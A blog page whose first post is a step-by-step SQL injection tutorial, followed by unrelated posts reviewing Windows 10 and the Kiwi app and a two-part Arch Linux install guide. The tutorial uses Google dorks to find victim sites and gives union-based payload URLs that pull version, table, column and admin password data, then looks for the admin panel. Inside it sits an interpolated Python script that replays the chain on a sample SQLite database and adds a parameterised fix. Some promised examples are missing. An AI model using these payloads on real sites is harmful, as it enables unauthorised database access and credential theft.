Tuesday, October 6, 2015

Donning the Shoes of A Hacker to know about SQL Injection

The Internet has undoubtedly made knowledge ubiquitous, but it has also exposed a great deal of software to attack. Plenty of malicious users are on the lookout for loopholes in your website, and at the top of the list today is SQL injection, one of the most effective and invasive ways to attack a site.

You can be a victim, if...

SQL injection attacks are reported daily, and a great many websites rely on data-driven designs to produce dynamic content for their readers. Because those designs are built on MySQL or another SQL database, every one of them that passes user input into a query is exposed to the danger.

Getting Acquainted

SQL injection attacks hit the database directly, so you need a reasonable grasp of SQL before you start. If you are new to it, a beginners' tutorial will cover what you need to know.

What are we discussing here? 

In this article we will discuss how a website is attacked using SQL injection. I am writing it so that you understand how these attacks reach a website and how you can protect yourself from them. Do not forget that performing a SQL injection attack against a site you are not authorized to test is against the law, and breaking the law has serious repercussions (so be cautious). This article is a step towards ethical hacking.

Thinking like a hacker: Step wise analysis

* First they bypass the logins
* The second step is to access the secret data
* Then they modify the content of the website
* The last step is to shut down the MySQL database server

This was a succinct summary, we will now discuss this in detail.

Step 1: Searching for exposed/ vulnerable websites: 

Google, the king of search engines, works as a holy grail for hackers. To find lists of vulnerable websites they use Google dorks: search strings crafted so that Google's own indexing surfaces pages built in a hackable way. Many operators help refine a search, but the most useful is "inurl:", which matches a term inside the page's URL (for instance the script name and the parameter the page takes).

For example you can type in:

Searching : 
1. Copy any of these search strings and paste it into Google's search bar.
2. Google will return a list of websites.
3. Then you need to visit each website and check whether it is vulnerable.

Step 2: Gauging the Vulnerability:

To check whether a website is vulnerable, add a single quote (') right after the numeric parameter at the end of the URL and press Enter. (There must be no space between the number and the quote.)

For instance:


If the page is unchanged, shows a "page not found" error, or shows some other page, the site does not leak SQL errors and this quick test tells you nothing more. Note that this is error-based detection only: an application that suppresses database errors can still be injectable (blind SQL injection), it just cannot be confirmed this way.

If instead an error message about the SQL query appears, the site is injectable.

For instance, an error message such as:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Step 3: Finding the Number of columns in the database:

Now that the hacker knows the site is vulnerable, the next move is to find out how many columns the vulnerable query returns, because a UNION can only be appended to a query with a matching number of columns.

This is not a big task: write "order by n" in place of the quote (with a space between the id and the statement).

Then increase n from 1, 2, ... until an error stating "Unknown column" appears.

For eg:

    http://www.hackable.com/index.php?id=2 order by 1
    http://www.hackable.com/index.php?id=2 order by 2
    http://www.hackable.com/index.php?id=2 order by 3
    http://www.hackable.com/index.php?id=2 order by 4

Keep increasing the number until an error stating "Unknown column" appears.

Suppose the error appears at 8; the number of columns is then n-1, i.e. 7 here.

This is not infallible, so if it does not work, append "--" (the MySQL comment marker) to the end of the statement so that the rest of the original query is ignored. MySQL only treats "--" as a comment when it is followed by whitespace, which a browser may strip from the end of a URL; "-- -" or "#" (URL-encoded as %23) are the usual workarounds.

For instance:

    http://www.hackable.com/index.php?id=2 order by 1--

Step 4: Knowing the Vulnerable columns:

The hackers use "union select columns_sequence" to find out which of those columns are actually rendered on the page. The "order by n" statement is replaced with this one, and the id value is swapped for one that matches no row, i.e. id=-2, so that only the UNION row is displayed; on some sites this is not necessary.

columns_sequence is the numbers 1 to n, separated by commas, where n is the column count found in the previous step. The numbers that show up on the page mark the columns whose values the attacker can read.

For eg:

Let us suppose that the number of columns is 7 ,then the query will be

    http://www.hackable.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If this trick does not work, you can also try this:

    http://www.hackable.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

Step 5: Fetching the  version, user, database

The next trick is to place "version()" in place of one of the numbers that appeared on the page, here numeral 3.

For eg:

    http://www.hackable.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

After doing so you will see a version string such as 5.0.x or 5.5.x.

Now, to find user() and database(), put them one by one in the place of version().

For eg:

  http://www.hackable.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

  http://www.hackable.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

If the above does not work, try this one, which passes the value through hex encoding and slips past some simple filters:

    http://www.hackable.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6:  Finding the Table Name

Finding the table names depends on the MySQL version. If the query above returned version 5 or above, the server has the information_schema catalog and you can list tables from it. Replace numeral 3 with

"group_concat(table_name)" and add "from information_schema.tables where table_schema=database()" after the column list.

You need to use the above query like this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

This query returns the table names of the current database, concatenated. Look for a table related to users or admins.

Then pick the "admin" table.

If the server is MySQL 4 or anything else without information_schema, you have to guess the table names, which is why SQL injection against version 4 is more laborious.

Step 7: Searching the  Column Name

To find the column names, replace "group_concat(table_name)" with "group_concat(column_name)"

and replace "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=mysqlchar--".

This step is crucial: the table name has to be written as a MySQL CHAR() expression so that no quote characters are needed (many applications escape quotes), and that expression goes in place of mysqlchar. For "admin" it is CHAR(97, 100, 109, 105, 110), the ASCII codes of the letters.

Finding the CHAR() form of the table name:
First of all, install the HackBar addon:

Then navigate to the following path:

Copy the resulting code and paste it in place of "mysqlchar" in the URL.
For eg:

    http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Running this returns the list of column names of that table, for instance:
 admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password, etc.

Now write group_concat(columnname,0x3a,anothercolumnname) in place of group_concat(column_name), substituting two of the listed column names for columnname and anothercolumnname (0x3a is the hex code of ":", used as a separator).

Then write "from table_name" (here "from admin") in place of "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)".

For eg:

    and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

You won't be lucky every time and will sometimes get errors stating that a column was not found; then try other columns.

This is how the username and password columns are found.

If a website has user accounts, this is a golden goose for hackers.
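The following script is an added, runnable example; it is not part of the original article and not Samuel Dawson's code. It models Steps 2 through 7 against a constructed SQLite database and puts the hardened handler beside the vulnerable one. SQLite stands in for MySQL so that it runs offline: the table names news and admin, the credentials, and all function names are constructed for the example, and the SQLite catalog names (sqlite_version(), sqlite_master, pragma_table_info()) are used where the article's MySQL queries use version() and information_schema.

```python
import sqlite3


def make_db():
    """Constructed sample database (not from the article): a 7-column 'news'
    table the page reads and an 'admin' table holding credentials."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT,
                          created TEXT, tags TEXT, hits INTEGER);
        INSERT INTO news VALUES(2, 'Hello', 'first post', 'editor',
                                '2015-10-06', 'intro', 1);
        CREATE TABLE admin(admin_id INTEGER, admin_name TEXT, admin_password TEXT);
        INSERT INTO admin VALUES(1, 'root', 's3cret'), (2, 'samuel', 'hunter2');
    """)
    return con


def vulnerable_lookup(con, id_param):
    """The defect the article relies on: the id from index.php?id=... is
    pasted into the SQL text, so anything after the number is parsed as SQL."""
    return con.execute("SELECT * FROM news WHERE id=" + id_param).fetchall()


def is_injectable(con):
    """Step 2: a trailing quote breaks the SQL grammar and the database error
    leaks out. Error-based detection only: a site that hides errors can still
    be injectable (blind injection), it just cannot be confirmed this way."""
    try:
        vulnerable_lookup(con, "2'")
        return False
    except sqlite3.OperationalError:
        return True


def count_columns(con, limit=50):
    """Step 3: 'order by n' fails once n exceeds the number of columns in the
    SELECT list (MySQL reports "Unknown column 'n' in 'order clause'")."""
    for n in range(1, limit + 1):
        try:
            vulnerable_lookup(con, f"2 order by {n}")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count exceeds probe limit")


def find_marker_columns(con, ncols):
    """Step 4: a non-matching id plus 'union select 1,...,n' makes the marker
    numbers appear wherever the page renders a column; those positions are
    the ones an attacker can read through."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    rows = vulnerable_lookup(con, f"-2 union select {markers}--")
    return [i for i in range(1, ncols + 1) if rows and rows[0][i - 1] == i]


def extract(con, ncols, expr, slot=3, tail=""):
    """Steps 5-7: put an expression into one readable slot (the article uses
    column 3) and optionally append a FROM clause."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expr
    payload = f"-2 and 1=2 union select {','.join(cols)} {tail}--"
    return vulnerable_lookup(con, payload)[0][slot - 1]


def run_chain(con):
    """Steps 2-7 end to end. SQLite names stand in for the MySQL ones:
    sqlite_version() for version(), sqlite_master for information_schema.tables,
    pragma_table_info() for information_schema.columns. char(97,100,109,105,110)
    spells 'admin' without quote characters, as MySQL's CHAR() does in Step 7."""
    if not is_injectable(con):
        return {}
    n = count_columns(con)
    return {
        "columns": n,
        "readable": find_marker_columns(con, n),
        "version": extract(con, n, "sqlite_version()"),
        "tables": extract(con, n, "group_concat(name)",
                          tail="from sqlite_master where type='table'"),
        "admin_columns": extract(con, n, "group_concat(name)",
                                 tail="from pragma_table_info(char(97,100,109,105,110))"),
        # MySQL's 0x3a is the string ':'; SQLite reads 0x3a as the integer 58,
        # so char(58) supplies the separator here.
        "credentials": extract(con, n, "group_concat(admin_name||char(58)||admin_password)",
                               tail="from admin"),
    }


def safe_lookup(con, id_param):
    """Hardened handler: validate the type, then bind the value as a parameter
    so the driver never parses it as SQL. Every payload above fails at int()."""
    return con.execute("SELECT * FROM news WHERE id=?", (int(id_param),)).fetchall()


def safe_rejects(con, id_param):
    """True when the hardened handler refuses the payload."""
    try:
        safe_lookup(con, id_param)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    for key, value in run_chain(db).items():
        print(f"{key}: {value}")
    print("hardened rejects probe:", safe_rejects(db, "-2 union select 1,2,3,4,5,6,7--"))
```

Running the script prints the column count, the readable positions, the version string, the table list, the admin table's columns and finally "root:s3cret,samuel:hunter2", the same progression the article walks through by hand. The fix is the last two functions: the id is checked to be an integer and then bound as a parameter, so none of the probes ever reach the SQL parser. In PHP against MySQL the equivalent is a prepared statement (PDO::prepare with a bound parameter) plus the same type check.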

Step 8: Fetching the Admin panel:

You need to start by trying with url like:


If you are lucky, you find the victim's admin URL this way; otherwise keep trying other permutations and combinations.

Author Biography:

Samuel Dawson has shared this article on how a SQL injection can be performed on a website. He is currently involved in converting PSD to HTML files for Designs2html Ltd.

Friday, July 31, 2015

Windows 10 review: Microsoft takes back its identity

Windows 10 logo
Last night I installed Windows 10 and I've been using it since. First of all, I think it's great: I really enjoy using it and the features are awesome. Here are some reasons why I love Windows 10:

The start button is back, and it's better than ever

Windows 10 start button

This was one of the weakest points of Windows 8. Microsoft forgot its own good idea for a moment and left the beloved start button out of Windows 8, which resulted in many customer complaints. Now the button is back, but it means more than just a button in the lower left corner of your screen. It means that Microsoft got the OS's identity back. One of the things I didn't like about Windows 8 was that the Metro view felt like a completely different and independent operating system. It was like having an OS embedded in another OS. Now, with Windows 10, we have a single, functional OS. Check Candy Crush, installed from the Windows Store, running right on the desktop.

Windows 10 Candy Crush

Multiple desktops

This feature was absent from Windows when Mac OS and Linux had had it for years. It was frustrating, but that's over. Multiple desktops work seamlessly, and they actually go very well with Windows. I don't know why they didn't include it before.

It's blazing fast

Windows 10 is much faster than Windows 8. At least, that's my impression as I write this article. Windows open faster and folders with large numbers of items (like photos) load much faster. In the past you always had to upgrade your hardware to some extent; in this case I'm using Windows 10 on the same hardware, with better performance.

You can paste text in the CMD console!!

Yes, I think it was pretty annoying to write everything letter by letter, especially when you can paste in the Linux console.

Simplest OS update ever

The update to Windows 10 was very, very simple. I didn't even have to configure anything; the process is completely automatic. Also, compatibility with my current software is excellent. So far I haven't had problems with any application.

The Action Center

This feature contains general information about notifications, wireless connections, settings, etc. It's like the upper menu in Android. Really useful, a great addition that was missing in Windows 8.

Windows 10 action center

What I didn't like

  • The store is better, but it's not good enough yet
  • I heard about some problems with the drivers in HP machines, but I didn't face those problems. If I find something strange, I'll write about it here
  • Cortana is unavailable in many countries
There are some important features like Microsoft Edge, but I'll dedicate a complete article to that. For now, this is just a glimpse of Windows 10. And so far, I really like it!

Thursday, July 30, 2015

Review of Kiwi, the social app to ask questions

For some time I've heard about Kiwi, but I didn't pay much attention to it until now. After all, this app has been downloaded more than 10 million times.

When I first downloaded and used Kiwi, Twitter came to mind. When Twitter first came out, I thought it was just a waste of time, but eventually I learned how to use it properly, and now I have an active Twitter account. Kiwi, however, is more of a way to get to know your friends better. It's like a small, enhanced piece of Facebook or Twitter.

Kiwi basically consists of asking your contacts questions and answering theirs.

The home screen shows a feed where you see the answers given by the people you are following:
Kiwi home screen

In the 'Nearby' screen you can see your current location and ask questions of nearby people. Interestingly, you can navigate to other locations and ask questions there. However, all of this is just for fun. Don't expect to find meaningful answers in Kiwi.
New York nearby

The next screen is just a list of questions for you to answer. Tap 'NEW QUESTION' to get a new list of questions.
Kiwi questions list
Tap the thunder icon to see your notifications. Here you'll find the usual stuff: likes to your answers, new answers to your questions, etc.
Finally, tap the right icon to open your profile.

I used Kiwi for about 4 days and I had fun, but I didn't communicate better with my acquaintances, nor did I get important news (as I do on Twitter). For now, my verdict would be "A waste of time". But I thought the same about Twitter and some other social networks when they first came out. In the case of Twitter, I realized that this social network is better for getting instant news and following celebrities. I think this is not its intended main use, but it finally found an area where it can be useful. Is this the same case with Kiwi? It's very hard to say. I checked my friends' feed and sometimes it turns into a simple chat, where everybody says 'hello' instead of asking questions. What do I think about this? This app won't last long. But if it does, I'll be glad, because it's fun and interesting.

By the way, I had a lot of crashes when I first tried to use it, but it immediately got better with a couple of updates.

Saturday, July 25, 2015

How to install Arch Linux, step by step, for VMware Workstation (Part III)

This is the final part of a tutorial I published in 3 parts (check part I and part II). Let's review what we have so far:
  • Create and boot a new Virtual Machine
  • Partition disk
  • Format partitions
  • Install basic system
To finish the installation, we still need to set some configurations:

Set main configuration

1. Generate the fstab file. This file lists the disk partitions and other data resources on Linux systems. For more information, check the Wikipedia entry for fstab. To generate the fstab file:

genfstab -U -p /mnt >> /mnt/etc/fstab

2. Execute Chroot:

arch-chroot /mnt

Note: After this, the console will display something like this:

3. Set the machine's name:

nano /etc/hostname

The command will open an empty text file. Just enter the name for the machine:
Hostname Arch Linux
Once you have typed the name, press Ctrl + X. Then type 'Y' and press Enter.

4. Set the time zone. Here you have to select the correct time zone for your geographical location. I'll set the time zone to New York, just as an example:

ln -s /usr/share/zoneinfo/America/New_York /etc/localtime

5. Set language. I'll set this to English. First, open the 'locale.conf' file:

nano /etc/locale.conf

Once inside the file, add this text: LANG=en_US.UTF-8
Arch Linux Language
That will set the language to English (United States). Now press Ctrl + X, type 'Y' and press Enter.

6. Activate language:

nano /etc/locale.gen

Look for this text: #en_US.UTF-8 UTF-8 and delete the # symbol.

locale.gen file
Press Ctrl + X, type 'Y' and press Enter.

7. Generate locales:
Enter this in the console:

Generating locales

8. Configure keyboard:

nano /etc/vconsole.conf

Add KEYMAP=us to the file for a US English keyboard layout. (Keymaps are named after the layout, so it is "us", not "en"; there is no "en" keymap and the console would fall back to the default at boot.)

English keymap

9. Install GRUB. First, just install it with:

grub-install /dev/sda

GRUB installed
Now, you need to generate the grub.cfg file:

grub-mkconfig -o /boot/grub/grub.cfg
Generate grub.cfg

10. Generate ramdisk:

mkinitcpio -p linux
Generating ramdisk
11. Set a password for root:

Password for root
Next, close Chroot with: exit.
Exit Chroot

12. Restart the system:


After the restart, if everything went well, you should see this screen:
Congratulations! You just installed Arch Linux successfully! Of course, there are some additional configurations we have to make, and also a proper GUI. I'll address these topics in future posts.

Monday, July 20, 2015

How to install Arch Linux, step by step, for VMware Workstation (Part II)

Note: If you didn't see the first part of this series of articles, I recommend you to check it out here.

Last time I wrote about the first steps to install Arch Linux. Now I'll continue with some step just a little more complicated. To summarize what we have so far:
  • Create and boot a new Virtual Machine
  • Partition disk
This article will continue from there. The next immediate step is to format the partitions. Let's begin.

Format partitions

1. First, get the partition table so you know which partitions you are manipulating. To do that, enter this command in the console: lsblk
Also, you should remember which of those partition corresponds to which type. In this case:

  • sda1: boot 
  • sda2: root
  • sda3: home
  • sda4: swap

2. Format partitions. Enter the following commands:

For boot:

mkfs -t ext2 /dev/sda1 

For root:

mkfs.ext4 /dev/sda2

For home:

mkfs.ext4 /dev/sda3

For swap:

mkswap /dev/sda4
swapon /dev/sda4

3. Mount the partitions:

Mount the root partition:

mount /dev/sda2 /mnt

Create a folders for Boot and Home:

mkdir /mnt/home
mkdir /mnt/boot

Mount the Home and Boot partitions in the folders you just created:

mount /dev/sda1 /mnt/boot
mount /dev/sda3 /mnt/home

System installation

1. Install the basic system. For this step, the first thing to do is to verify our internet connection. If you followed this guide and left the virtual machine's settings at their defaults, you should have internet access. To verify that, type:

ping -c 3 www.google.com

You should see an output like this:

Ping output

Now, install the base system with pacstrap:

pacstrap /mnt base base-devel

Next, a lot of packages will be downloaded and installed. When the process finishes, you should see something like this:

Base system installed

Just in case your Internet connection fails for any reason, don't freak out: the downloads will retry when the connection comes back. This is just a detail, but it's worth mentioning.

2. Install GRUB. As you may already know, we need GRUB to boot the system. Install it with:

pacstrap /mnt grub-bios

As in the previous step, some files will be downloaded:

Installing GRUB
3. Install NetworkManager. This will manage the network connections:

pacstrap /mnt networkmanager

And this is the end of the second part of this series. We are almost ready to use our Arch Linux virtual machine; we just need to make some customizations. I'll be writing about it soon!